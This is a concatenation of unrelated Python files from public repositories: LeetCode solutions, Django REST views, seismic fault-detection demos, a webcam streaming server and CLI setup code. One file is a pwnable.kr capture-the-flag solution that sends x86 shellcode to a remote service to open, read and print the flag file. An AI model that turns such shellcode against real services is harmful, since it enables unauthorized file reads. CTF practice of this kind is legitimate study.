peraktong/LEETCODE_Jason
|
c5d4a524ba69b1b089f18ce4a53dc8f50ccbb88c
|
06961cc468211b9692cd7a889ee38d1cd4e1d11e
|
refs/heads/master
| 2022-04-12T11:34:38.738731
| 2020-04-07T21:17:04
| 2020-04-07T21:17:04
| 219,398,022
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,511
|
py
|
#Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution():
def mergeTrees(self, t1, t2):
"""
:type t1: TreeNode
:type t2: TreeNode
:rtype: TreeNode
"""
# 100 pass -95% runtime and 100% space
# Recursive function to traverse the trees
def traverse(node1, node2):
# When both the nodes are present, change value to their sum
if node1 and node2:
node1.val = node1.val + node2.val
# If both left are present recurse, else if node2 only present then replace node1 as node2
if node1.left and node2.left:
traverse(node1.left, node2.left)
elif node2.left:
node1.left = node2.left
# If both right are present recurse, else if node2 only present then replace node1 as node2
if node1.right and node2.right:
traverse(node1.right, node2.right)
elif node2.right:
node1.right = node2.right
# Null check for root node of both tree
if not t1:
return t2
if not t2:
return t1
# Recursive call
traverse(t1, t2)
# Return the root of the first tree
return t1
t1 = TreeNode(x=[1,3,2,5])
t2 = TreeNode(x=[2,1,3,None,4,None,7])
model = Solution()
final = model.mergeTrees(t1=t1,t2=t2)
|
[
"caojunzhi@caojunzhisMBP3.fios-router.home"
] |
caojunzhi@caojunzhisMBP3.fios-router.home
|
60e4c38da404de4ba7dd46169d7c52c288298335
|
ff55497043e91b5168b54369f3fd3f400dc9cf22
|
/project/osmosis/event/api/views.py
|
14fc471a28bddb1ce37cad0dcec068af4eba4872
|
[] |
no_license
|
kirami/Appevate
|
c890329928e2a9f91ded1cde29477c86b58e35ca
|
ee62eacd66606f3baf308718e5dbc6b7e55ba43b
|
refs/heads/master
| 2022-12-02T00:07:59.448070
| 2020-07-22T01:23:27
| 2020-07-22T01:23:27
| 211,752,576
| 0
| 0
| null | 2022-11-22T05:52:38
| 2019-09-30T01:36:35
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
from rest_framework import viewsets, permissions
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from ..models import Event
from .serializers import EventSerializer
from rest_framework.permissions import IsAuthenticated
import logging
logger = logging.getLogger(__name__)
class EventViewSet(viewsets.ModelViewSet):
model = Event
serializer_class = EventSerializer
queryset = Event.objects.all()
'''
def get_permissions(self):
"""
Permissions for the ``User`` endpoints.
- Allow create if the user is not authenticated.
- Allow all if the user is staff.
- Allow all if the user who is making the request is the same
as the object in question.
"""
return (permissions.AllowAny() if self.request.method == 'POST'
else IsStaffOrTargetUser()),
'''
class EventList(generics.ListCreateAPIView):
"""
get:
Return a list of existing Events, filtered by any paramater sent.<br>
Possible Parameters - <br>
   id - Id of the Event you'd like to view<br>
   host - Id of the User who is hosting an Event<br>
   program - Program under which the Event is listed.<br>
   name - Name of the Event you'd like to search for<br>
post:
Create a new Event instance.
"""
serializer_class = EventSerializer
permission_classes = (IsAuthenticated,)
def get_queryset(self):
queryset = Event.objects.all()
host = self.request.query_params.get('host', None)
name = self.request.query_params.get('name', None)
program = self.request.query_params.get('program', None)
item_id = self.request.query_params.get('id', None)
if item_id is not None:
queryset = queryset.filter(id=item_id)
if name is not None:
queryset = queryset.filter(name=name)
if host is not None:
queryset = queryset.filter(host=host)
if program is not None:
queryset = queryset.filter(program=program)
return queryset
class EventDetail(generics.RetrieveUpdateDestroyAPIView):
"""
Get Detail of single Event
put:
Replacing entire Event instance.
patch:
Update an Event instance
delete:
Delete an Event instance
"""
queryset = Event.objects.all()
serializer_class = EventSerializer
permission_classes = (IsAuthenticated,)
|
[
"="
] |
=
|
9b05835b3205d9de4fd50aa8af20d2fbceef046d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_struggled.py
|
e5baa8e75aa991db85ea0ac09e2bb191bec47c29
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
from xai.brain.wordbase.verbs._struggle import _STRUGGLE
#calss header
class _STRUGGLED(_STRUGGLE, ):
def __init__(self,):
_STRUGGLE.__init__(self)
self.name = "STRUGGLED"
self.specie = 'verbs'
self.basic = "struggle"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
bf4267262480d8f9e04bb70a25dc61e4d56cdfe1
|
c36d9d70cbb257b2ce9a214bcf38f8091e8fe9b7
|
/977_squares_of_a_sorted_array.py
|
b06d138fadd0a72054f3ac664f5b51dc8b9a84ce
|
[] |
no_license
|
zdadadaz/coding_practice
|
3452e4fc8f4a79cb98d0d4ea06ce0bcae85f96a0
|
5ed070f22f4bc29777ee5cbb01bb9583726d8799
|
refs/heads/master
| 2021-06-23T17:52:40.149982
| 2021-05-03T22:31:23
| 2021-05-03T22:31:23
| 226,006,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 463
|
py
|
class Solution:
def sortedSquares(self, nums: List[int]) -> List[int]:
l = 0
r = len(nums)-1
res = []
while l <= r:
if l == r:
res.append(nums[r]*nums[r])
break
if nums[l]*nums[l] < nums[r]*nums[r]:
res.append(nums[r]*nums[r])
r-=1
else:
res.append(nums[l]*nums[l])
l+=1
return res[::-1]
|
[
"zdadadaz5566@gmail.com"
] |
zdadadaz5566@gmail.com
|
fed1b0600df776f414b4d2a66a68c13f4e7e15c1
|
8dbf11fe48645d79da06e0c6e9d6a5cc5e3116d5
|
/pwnable_kr/asm/myShellcode.py
|
adddf23bdafcaa8b8825def5d8aa9549a4c91028
|
[] |
no_license
|
itaysnir/Learning
|
e1efb6ab230b3c368214a5867ef03670571df4b7
|
a81c351df56699cc3f25618c81f8e04259596fd3
|
refs/heads/master
| 2021-05-23T09:33:58.382930
| 2021-02-17T19:36:46
| 2021-02-17T19:36:46
| 253,222,982
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,868
|
py
|
import pwnlib
import socket
FLAG_NAME = ".////this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"
IP = "pwnable.kr"
PORT = 9026
CHUNK = 4096
def main():
s = socket.socket()
s.connect ((IP,PORT))
data = s.recv (CHUNK)
print (data)
data = s.recv (CHUNK)
print (data)
reverse_flag_name_chunks = list(map(''.join, zip(*[iter(FLAG_NAME)]*4)))[::-1]
# open syscall
shellcode = ''
shellcode += pwnlib.asm.asm ("xor eax, eax")
shellcode += pwnlib.asm.asm ("push eax") # needed for the string null byte
shellcode += pwnlib.asm.asm ("add eax, 5")
for chunk in reverse_flag_name_chunks:
num = "0x" + ''.join(x.encode('hex') for x in chunk[::-1])
shellcode += pwnlib.asm.asm ("push {}".format(num))
shellcode += pwnlib.asm.asm ("mov ebp, esp")
# shellcode += pwnlib.asm.asm ("xor ecx, ecx")
shellcode += pwnlib.asm.asm ("xor edx, edx")
shellcode += pwnlib.asm.asm ("int 0x80")
# read syscall
shellcode += pwnlib.asm.asm ("xor eax, eax")
shellcode += pwnlib.asm.asm ("add eax, 3")
shellcode += pwnlib.asm.asm ("mov ecx, ebx")
shellcode += pwnlib.asm.asm ("xor ebx, ebx")
shellcode += pwnlib.asm.asm ("add ebx, 3")
shellcode += pwnlib.asm.asm ("xor edx, edx")
shellcode += pwnlib.asm.asm ("mov dl, 0x60")
shellcode += pwnlib.asm.asm ("int 0x80")
# write syscall
shellcode += pwnlib.asm.asm ("xor eax, eax")
shellcode += pwnlib.asm.asm ("add eax, 4")
shellcode += pwnlib.asm.asm ("xor ebx, ebx")
shellcode += pwnlib.asm.asm ("add ebx, 1")
shellcode += pwnlib.asm.asm ("int 0x80")
shellcode += '\n'
print (shellcode)
s.send (shellcode)
data = s.recv (CHUNK)
print (data)
data = s.recv (CHUNK)
print (data)
if __name__ == '__main__':
main()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
640729d778883cd226020e47fea25bef8b99c520
|
5730110af5e4f0abe538ed7825ddd62c79bc3704
|
/pacu/pacu/api/__init__.py
|
5175c837b94da18470240e65eb75f00c9ed2e717
|
[] |
no_license
|
jzeitoun/pacu-v2
|
bdbb81def96a2d87171ca20b89c878b2f66975e7
|
0ccb254a658263b4fe8c80ea623f860cb7dc1428
|
refs/heads/master
| 2021-06-03T18:50:50.890399
| 2020-04-27T16:31:59
| 2020-04-27T16:31:59
| 110,889,657
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,680
|
py
|
import sys
from argparse import ArgumentParser, Action
if sys.argv[0] in ['-c', '-m']:
sys.argv[0] = 'python -m %s' % __package__
parser = ArgumentParser(
description = 'PACU v0.0.1',
epilog = "Contact to: Hyungtae Kim <hyungtk@uci.edu>",
)
group = parser.add_argument_group(
title='profiles',
description='''
You can provide a specific set of profiles for essential configurations.
It is strongly recommended to go through
the profile section of the documentation before you use it in production.
Profiles should be passed in prior to specific API.
''')
group.add_argument('--web', metavar='PROFILE',
help='which profile to use for web')
group.add_argument('--db', metavar='PROFILE',
help='which profile to use for db')
group.add_argument('--log', metavar='PROFILE',
help='which profile to use for log')
group.add_argument('--opt', metavar='PROFILE',
help='which profile to use for opt')
subparsers = parser.add_subparsers(
title = 'Available APIs',
dest = 'api',
metavar = 'API',
help = 'Description',
description = '''
You can get additional help by typing one of below commands.
Also, it is possible to override current profile by
passing arguments like `--web.port=12345 --db.echo=false`.
Make sure these extra arguments should come after specific API.
''',
)
def metavars(var, args):
return {
action.dest: getattr(args, action.dest)
for action in parser._actions
if action.metavar==var}
# API registration
# from . import ping
from . import prof
from . import serve
from . import shell
# from . import query
# from . import vstim
|
[
"jzeitoun@uci.edu"
] |
jzeitoun@uci.edu
|
89d41180976614c3296c1f1ce9742f81d479d5cd
|
acdc8a6dcf131592ef7edb6452ee9da656d47d18
|
/src/spv/demoFault2dCrf.py
|
68062296649c2e88d4739e0da4f68460c439a60d
|
[] |
no_license
|
xuewengeophysics/xmw
|
c359ed745c573507d1923375d806e6e87e3982a2
|
5f36d5f140dcfc0b7da29084c09d46ab96897f3c
|
refs/heads/master
| 2021-01-01T19:44:07.737113
| 2017-07-27T17:56:21
| 2017-07-27T17:56:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,065
|
py
|
#############################################################################
"""
Demo of dynamic warping for automatic picking
Author: Xinming Wu, University of Texas at Austin
Version: 2016.06.01
"""
from utils import *
setupForSubset("crf2d")
s1,s2,s3 = getSamplings()
n1,n2,n3 = s1.count,s2.count,s3.count
f1,f2,f3 = s1.getFirst(),s2.getFirst(),s3.getFirst()
d1,d2,d3 = s1.getDelta(),s2.getDelta(),s3.getDelta()
#############################################################################
gxfile = "gx808"
gxfile = "gx3366"
elfile = "el"
fpfile = "fp"
fefile = "fe"
ftfile = "ft"
flfile = "fl"
ptfile = "pt"
fvfile = "fv"
pngDir = getPngDir()
pngDir = None
plotOnly = False
def main(args):
#goFaultLikelihood()
#goLinearity()
#goFaultOrientScan()
goPathVoting()
def goLinearity():
gx = readImage(gxfile)
el = zerofloat(n1,n2)
lof = LocalOrientFilter(16,8)
est = lof.applyForTensors(gx)
dst = DstCoherence(est,30)
dst.setEigenvalues(1,0.01)
dst.applyForLinear(gx,el)
writeImage(elfile,el)
el = pow(el,8)
plot(gx,sub(1,el),cmin=0.6,cmax=1.0,cmap=jetRamp(1.0),label="Linearity")
def goFaultOrientScan():
gx = readImage(gxfile)
el = readImage(elfile)
fos = FaultOrientScanner2(8)
fe,fp = fos.scanDip(65,80,el)
ft,pt = fos.thin([fe,fp])
writeImage(ftfile,ft)
writeImage(ptfile,pt)
def goPathVoting():
gx = readImage(gxfile)
if not plotOnly:
ft = readImage(ftfile)
pt = readImage(ptfile)
osv = OptimalPathVoter(20,60)
osv.setStrainMax(0.2)
osv.setSurfaceSmoothing(2)
fv = osv.applyVoting(4,0.7,ft,pt)
writeImage(fvfile,fv)
else:
fv = readImage(fvfile)
plot(gx,cmin=-2,cmax=2,label="Amplitude")
plot(gx,fv,cmin=0.6,cmax=1.0,cmap=jetRamp(1.0),label="Path voting")
def goFaultLikelihood():
print "goFaultLikelihood ..."
gx = readImage(gxfile)
gx = FaultScanner2.taper(10,0,gx)
fs = FaultScanner2(30)
sig1,sig2,smooth=16.0,2.0,4.0
fl,ft = fs.scan(65,80,sig1,sig2,smooth,gx)
flt,ftt = fs.thin([fl,ft])
print "fl min =",min(fl)," max =",max(fl)
print "ft min =",min(ft)," max =",max(ft)
plot(gx,flt,cmin=0.6,cmax=1,cmap=jetRamp(1.0),neareast=True,
label="Fault Likelihood")
'''
plot2(s1,s2,gx,g=abs(ft),cmin=minTheta,cmax=maxTheta,cmap=jetFill(1.0),
label="Fault dip (degrees)",png="ft")
'''
def gain(x):
n2 = len(x)
n1 = len(x[0])
g = mul(x,x)
ref = RecursiveExponentialFilter(20.0)
ref.apply(g,g)
y = zerofloat(n1,n2)
div(x,sqrt(g),y)
return y
def smooth(sig,u):
v = copy(u)
rgf = RecursiveGaussianFilterP(sig)
rgf.apply0(u,v)
return v
def smooth2(sig1,sig2,u):
v = copy(u)
rgf1 = RecursiveGaussianFilterP(sig1)
rgf2 = RecursiveGaussianFilterP(sig2)
rgf1.apply0X(u,v)
rgf2.applyX0(v,v)
return v
def normalize(e):
emin = min(e)
emax = max(e)
return mul(sub(e,emin),1.0/(emax-emin))
def etran(e):
#return transpose(pow(e,0.25))
return transpose(e)
def dtran(d):
return transpose(d)
def makeSequences():
n = 500
fpeak = 0.125
shift = 2.0/fpeak
#w = Warp1Function.constant(shift,n)
w = WarpFunction1.sinusoid(shift,n)
#f = makeCosine(fpeak,n)
f = makeRandomEvents(n,seed=seed);
g = w.warp(f)
f = addRickerWavelet(fpeak,f)
g = addRickerWavelet(fpeak,g)
f = addNoise(nrms,fpeak,f,seed=10*seed+1)
g = addNoise(nrms,fpeak,g,seed=10*seed+2)
s = zerofloat(n)
for i in range(n):
s[i] = w.ux(i)
return f,g,s
def makeCosine(freq,n):
return cos(mul(2.0*PI*freq,rampfloat(0.0,1.0,n)))
def makeRandomEvents(n,seed=0):
if seed!=0:
r = Random(seed)
else:
r = Random()
return pow(mul(2.0,sub(randfloat(r,n),0.5)),15.0)
def addRickerWavelet(fpeak,f):
n = len(f)
ih = int(3.0/fpeak)
nh = 1+2*ih
h = zerofloat(nh)
for jh in range(nh):
h[jh] = ricker(fpeak,jh-ih)
g = zerofloat(n)
Conv.conv(nh,-ih,h,n,0,f,n,0,g)
return g
def ricker(fpeak,time):
x = PI*fpeak*time
return (1.0-2.0*x*x)*exp(-x*x)
def addNoise(nrms,fpeak,f,seed=0):
n = len(f)
if seed!=0:
r = Random(seed)
else:
r = Random()
nrms *= max(abs(f))
g = mul(2.0,sub(randfloat(r,n),0.5))
g = addRickerWavelet(fpeak,g)
#rgf = RecursiveGaussianFilter(3.0)
#rgf.apply1(g,g)
frms = sqrt(sum(mul(f,f))/n)
grms = sqrt(sum(mul(g,g))/n)
g = mul(g,nrms*frms/grms)
return add(f,g)
#############################################################################
# plotting
gray = ColorMap.GRAY
jet = ColorMap.JET
backgroundColor = Color(0xfd,0xfe,0xff) # easy to make transparent
def jetFill(alpha):
return ColorMap.setAlpha(ColorMap.JET,alpha)
def jetFillExceptMin(alpha):
a = fillfloat(alpha,256)
a[0] = 0.0
return ColorMap.setAlpha(ColorMap.JET,a)
def bwrNotch(alpha):
a = zerofloat(256)
for i in range(len(a)):
if i<128:
a[i] = alpha*(128.0-i)/128.0
else:
a[i] = alpha*(i-127.0)/128.0
return ColorMap.setAlpha(ColorMap.BLUE_WHITE_RED,a)
def bwrFillExceptMin(alpha):
a = fillfloat(alpha,256)
a[0] = 0.0
return ColorMap.setAlpha(ColorMap.BLUE_WHITE_RED,a)
def jetRamp(alpha):
return ColorMap.setAlpha(ColorMap.JET,rampfloat(0.0,alpha/256,256))
def bwrRamp(alpha):
return ColorMap.setAlpha(ColorMap.BLUE_WHITE_RED,rampfloat(0.0,alpha/256,256))
def grayRamp(alpha):
return ColorMap.setAlpha(ColorMap.GRAY,rampfloat(0.0,alpha/256,256))
def plot(f,g=None,ps=None,t=None,cmap=None,cmin=None,cmax=None,cint=None,
label=None,neareast=False,png=None):
orientation = PlotPanel.Orientation.X1DOWN_X2RIGHT;
n1,n2=len(f[0]),len(f)
s1,s2=Sampling(n1),Sampling(n2)
panel = PlotPanel(1,1,orientation)#,PlotPanel.AxesPlacement.NONE)
panel.setVInterval(50)
panel.setHInterval(50)
panel.setHLabel("Inline (traces)")
panel.setVLabel("Depth (samples)")
pxv = panel.addPixels(0,0,s1,s2,f);
pxv.setColorModel(ColorMap.GRAY)
pxv.setInterpolation(PixelsView.Interpolation.LINEAR)
if g:
pxv.setClips(-2,2)
else:
if cmin and cmax:
pxv.setClips(cmin,cmax)
if g:
pv = panel.addPixels(s1,s2,g)
if neareast:
pv.setInterpolation(PixelsView.Interpolation.NEAREST)
else:
pv.setInterpolation(PixelsView.Interpolation.LINEAR)
pv.setColorModel(cmap)
if cmin and cmax:
pv.setClips(cmin,cmax)
if ps:
uv = panel.addPoints(0,0,ps[0],ps[1])
uv.setLineColor(Color.YELLOW)
uv.setLineWidth(2)
if label:
panel.addColorBar(label)
panel.setColorBarWidthMinimum(55)
moc = panel.getMosaic();
frame = PlotFrame(panel);
frame.setDefaultCloseOperation(PlotFrame.EXIT_ON_CLOSE);
#frame.setTitle("normal vectors")
frame.setVisible(True);
#frame.setSize(1400,700)
frame.setSize(round(n2*1.8),round(n1*2.0))
frame.setFontSize(12)
if pngDir and png:
frame.paintToPng(720,3.333,pngDir+png+".png")
#############################################################################
# Run the function main on the Swing thread
import sys
class _RunMain(Runnable):
def __init__(self,main):
self.main = main
def run(self):
self.main(sys.argv)
def run(main):
SwingUtilities.invokeLater(_RunMain(main))
run(main)
|
[
"xinwucwp@gmail.com"
] |
xinwucwp@gmail.com
|
90632c12ee018323d838f0314ad1509f5b1b1450
|
ac8ffabf4d7339c5466e53dafc3f7e87697f08eb
|
/python_solutions/1269.number_of_ways_to_stay_in_the_same_place_after_some_steps.py
|
726086e2ad3c752a2b74ee77af09767afc7d3401
|
[] |
no_license
|
h4hany/leetcode
|
4cbf23ea7c5b5ecfd26aef61bfc109741f881591
|
9e4f6f1a2830bd9aab1bba374c98f0464825d435
|
refs/heads/master
| 2023-01-09T17:39:06.212421
| 2020-11-12T07:26:39
| 2020-11-12T07:26:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,581
|
py
|
# https://leetcode.com/problems/number-of-ways-to-stay-in-the-same-place-after-some-steps
# Hard (Difficulty)
# You have a pointer at index 0 in an array of size arrLen. At each step, you can move 1 position to the left, 1 position to the right in the array or stay in the same place (The pointer should not be placed outside the array at any time).
# Given two integers steps and arrLen, return the number of ways such that your pointer still at index 0 after exactly steps steps.
# Since the answer may be too large, return it modulo 10^9 + 7.
#
# Example 1:
# Example 2:
# Example 3:
#
# Constraints:
# Input: steps = 3, arrLen = 2
# Output: 4
# Explanation: There are 4 differents ways to stay at index 0 after 3 steps.
# Right, Left, Stay
# Stay, Right, Left
# Right, Stay, Left
# Stay, Stay, Stay
#
# Input: steps = 2, arrLen = 4
# Output: 2
# Explanation: There are 2 differents ways to stay at index 0 after 2 steps
# Right, Left
# Stay, Stay
#
# Input: steps = 4, arrLen = 2
# Output: 8
#
# xxxxxxxxxx
# class Solution {
# public:
# int numWays(int steps, int arrLen) {
#
# }
# };
class Solution:
def numWays(self, steps: int, arrLen: int) -> int:
sz = min(steps // 2 + 1, arrLen) + 2
pre, cur = [0] * sz, [0] * sz
pre[1] = 1
while steps > 0:
for i in range(1, sz - 1):
cur[i] = (pre[i] + pre[i-1] + pre[i+1]) % 1000000007
pre, cur = cur, pre
steps -= 1
return pre[1]
print(Solution().numWays(4, 2))
|
[
"ssruoz@gmail.com"
] |
ssruoz@gmail.com
|
854ca1b46498b6117d9f373caa9b6aa1588e13d0
|
fa93e53a9eee6cb476b8998d62067fce2fbcea13
|
/build/pmb2_gazebo/catkin_generated/pkg.installspace.context.pc.py
|
c75e0ff2d2813071cbaee70567d2107aebd6d308
|
[] |
no_license
|
oyetripathi/ROS_conclusion_project
|
2947ee2f575ddf05480dabc69cf8af3c2df53f73
|
01e71350437d57d8112b6cec298f89fc8291fb5f
|
refs/heads/master
| 2023-06-30T00:38:29.711137
| 2021-08-05T09:17:54
| 2021-08-05T09:17:54
| 392,716,311
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 384
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "pmb2_gazebo"
PROJECT_SPACE_DIR = "/home/sandeepan/tiago_public_ws/install"
PROJECT_VERSION = "1.0.1"
|
[
"sandeepan.ghosh.ece20@itbhu.ac.in"
] |
sandeepan.ghosh.ece20@itbhu.ac.in
|
9a2357b2017589fa88e975403385725ce748aa8e
|
b103d82e2f99815b684a58cad043c14bbc43c1aa
|
/exercicios3/ex115.py
|
16a0f690f2137e5aaa6f2d96caae48e7c3d6fff5
|
[
"MIT"
] |
permissive
|
LuanGermano/Mundo-3-Curso-em-Video-Python
|
6e3ffc5d82de55194cf0cfd318f1f37ff7e04f1f
|
1dffda71ff769e4e901b85e4cca5595a5dbb545c
|
refs/heads/main
| 2023-07-09T22:40:13.710547
| 2021-08-04T05:16:22
| 2021-08-04T05:16:22
| 392,557,796
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
# Crie um pequeno sistema modularizado que permita cadastrar pessoas pelo seu nome e idade em um arquivo de texto simples.
# O sistema só vai ter 2 opções, cadastrar uma nova pessoa e listar todas as cadastradas
|
[
"88220713+LuanGermano@users.noreply.github.com"
] |
88220713+LuanGermano@users.noreply.github.com
|
35b3d73af0a8e35ea5d24e76857a1e773f865d8c
|
f0fe4f17b5bbc374656be95c5b02ba7dd8e7ec6d
|
/all_functions/linux server/python GUI/Video capture/VideoCapture-0.9-5/Tools/3rdParty/pushserver/server.py
|
83fe04d6bb7eef7b5a3a46f7d7f9eafce7ac910d
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT",
"LGPL-2.1-only"
] |
permissive
|
Heroku-elasa/heroku-buildpack-python-ieee-new
|
f46a909ebc524da07f8e15c70145d1fe3dbc649b
|
06ec2fda04d9e478ed2506400e460489b0ca91ab
|
refs/heads/master
| 2022-12-10T13:14:40.742661
| 2020-01-29T14:14:10
| 2020-01-29T14:14:10
| 60,902,385
| 0
| 0
|
MIT
| 2022-12-07T23:34:36
| 2016-06-11T10:36:10
|
Python
|
UTF-8
|
Python
| false
| false
| 3,094
|
py
|
import SimpleHTTPServer
import urllib
import StringIO
import posixpath, sys, string
import time
from VideoCapture import *
cam = Device(devnum=0)
#~ cam.setResolution(640, 480) # VGA
#~ cam.setResolution(768, 576) # PAL
#~ cam.setResolution(384, 288) # PAL / 4
#~ cam.setResolution(192, 144) # PAL / 16
#~ cam.setResolution(80, 60) # Minimum
sys.stderr = sys.stdout
class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def sendImage(self):
try:
image = cam.getImage(timestamp=3, boldfont=1)
stros = StringIO.StringIO()
image.save(stros, "jpeg")
jpgStr = stros.getvalue()
sys.stderr.write("len: %d\n" % len(jpgStr))
self.send_response(200)
self.send_header("Content-type", "image/jpeg")
self.end_headers()
self.wfile.write(jpgStr)
except:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("Problem sending image: %s\n" % self.path)
def pushImages(self):
self.separator = "abcdef"
self.maxFrames = 0
try:
self.send_response(200)
self.send_header("Content-type",
"multipart/x-mixed-replace;boundary=%s" % self.separator)
self.end_headers()
self.wfile.write("--%s\r\n" % self.separator)
frameNo = 0
while 1:
time.sleep(0.04)
frameNo = frameNo + 1
if self.maxFrames > 0 and frameNo > 1000:
break
image = cam.getImage(timestamp=3, boldfont=1)
stros = StringIO.StringIO()
image.save(stros, "jpeg")
jpgStr = stros.getvalue()
sys.stderr.write("len: %d\n" % len(jpgStr))
self.wfile.write("Content-type: image/jpeg\r\n")
#self.wfile.write("Content-length: %d\r\n" % len(jpgStr))
self.wfile.write("\r\n")
self.wfile.write(jpgStr)
self.wfile.write("\r\n--%s\r\n" % self.separator)
except:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("Problem sending image: %s\n" % self.path)
def do_GET(self):
"""Serve a GET request."""
if self.path[:len("/quit")] == "/quit":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("exiting....")
global cam
del cam
sys.exit(0)
if self.path[:len("/cam")] == "/cam":
self.sendImage()
return
if self.path[:len("/push")] == "/push":
self.pushImages()
return
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
return
if len(sys.argv) == 1:
sys.argv = (sys.argv[0], "8000")
SimpleHTTPServer.test(MyHandler)
|
[
"soheil_paper@yahoo.com"
] |
soheil_paper@yahoo.com
|
2dd34ed91d4e5ea625355a87413ad5af693536b9
|
f5ef25c84e9b4846f98d520bc9a20d20b3d1b65c
|
/set/set1.py
|
6741123a44faca8e18c340dcbfe9628da7fabf2d
|
[] |
no_license
|
amiraHag/python-basic-course2
|
45757ffdfa677c2accd553330cd2fd825208b0aa
|
1fbfd08b34f3993299d869bd55c6267a61dc7810
|
refs/heads/main
| 2023-03-31T06:48:11.587127
| 2021-03-30T03:43:10
| 2021-03-30T03:43:10
| 327,271,713
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,162
|
py
|
# ---------------------------------------------------------------------------------------
#
# -----------------------
# --------- Set ---------
# -----------------------
#
#
# [1] Set Items Are Enclosed in Curly Braces
# [2] Set Items Are Not Ordered And Not Indexed
# [3] Set Indexing and Slicing Cant Be Done
# [4] Set Has Only Immutable Data Types (Numbers, Strings, Tuples) List and Dict Are Not
# [5] Set Items Is Unique
# ---------------------------------------------------------------------------------------
# used {} not [] like lists or () like tuples
set1 = {"Amira",100,True,2,30,4,5,6,7,8}
# Set items Not Ordered And Not Indexed NOt Slicing
print(set1)
#print(set1[2]) Error -> TypeError: 'set' object does not support indexing
#print(set1[1:3]) Error -> TypeError: 'set' object is not subscriptable
# Set elements from Only Immutable Data Types
#mySet2 = {"Amira", 4, 1.5, True, [1, 2, 3]} # Eror -> TypeError: unhashable type: 'list'
#print(mySet2)
mySet3 = {"Amira", 4, 1.5, True, (1, 2, 3)}
print(mySet3)
# Set Items Is Unique
mySet4 = {1, 2, "A", "B", "A", True, 54, 2} # Will remove the repeated version of the element
print(mySet4)
|
[
"amira071846@feng.bu.edu.eg"
] |
amira071846@feng.bu.edu.eg
|
88492f33f8de534399893ebb273852326688d51d
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/last_thing/come_new_day_at_own_point/have_problem_of_own_year/different_eye.py
|
06693d6b27f56d6d2f8b7d46e4ca6e54ac2525b6
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 277
|
py
|
#! /usr/bin/env python
def feel_other_person_for_young_hand(str_arg):
find_work_from_own_group(str_arg)
print('use_person')
def find_work_from_own_group(str_arg):
print(str_arg)
if __name__ == '__main__':
feel_other_person_for_young_hand('different_thing')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
57f40905b587a23a5f6f1a4d5e6fed0da1a38750
|
85c57781b746a141e469843ff7d94577cd4bf2a5
|
/src/cfnlint/rules/functions/FindInMapKeys.py
|
6b12f775741e2caf583e17463ca2cdc750de9a07
|
[
"MIT-0"
] |
permissive
|
genums/cfn-python-lint
|
ac2ea0d9a7997ed599ba9731127a6cada280f411
|
b654d7fc0ed249d0522b8168dc7e1f4170675bc4
|
refs/heads/master
| 2020-04-18T00:49:03.922092
| 2019-01-21T23:58:02
| 2019-01-21T23:58:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,940
|
py
|
"""
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
